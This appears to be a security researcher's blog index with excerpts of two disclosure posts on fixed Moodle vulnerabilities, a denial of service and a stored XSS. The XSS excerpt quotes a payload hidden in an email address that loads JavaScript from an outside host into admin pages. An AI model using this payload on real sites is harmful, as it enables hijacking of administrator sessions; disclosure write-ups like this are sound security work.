CVE-2020-14322 @ Moodle – Unauthenticated Denial of Service [ BREAKTIME ]

This blogpost is about an Unauthenticated DoS vulnerability which I found in Moodle in April, 2020. It was fixed on 13 July 2020 and was assigned CVE-2020-14322. Legal disclaimer: Usage of this vulnerability for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and… Continue reading CVE-2020-14322 @ Moodle – Unauthenticated Denial of Service [ BREAKTIME ]

CVE-2019-14881 @ Moodle – Stored-Xss on email reflected on various pages

This blogpost is about a Stored XSS vulnerability which I found in Moodle in September, 2019. It was fixed in November 2019 and was assigned CVE-2019-14881. TLDR: If you specially craft a payload ( like “><svg/onload=import(‘https://c2.tadeu.work/a.js’)>”@tadeu.work ) and update your email, you can execute JavaScript in certain pages like “browse users” in the admin area… Continue reading CVE-2019-14881 @ Moodle – Stored-Xss on email reflected on various pages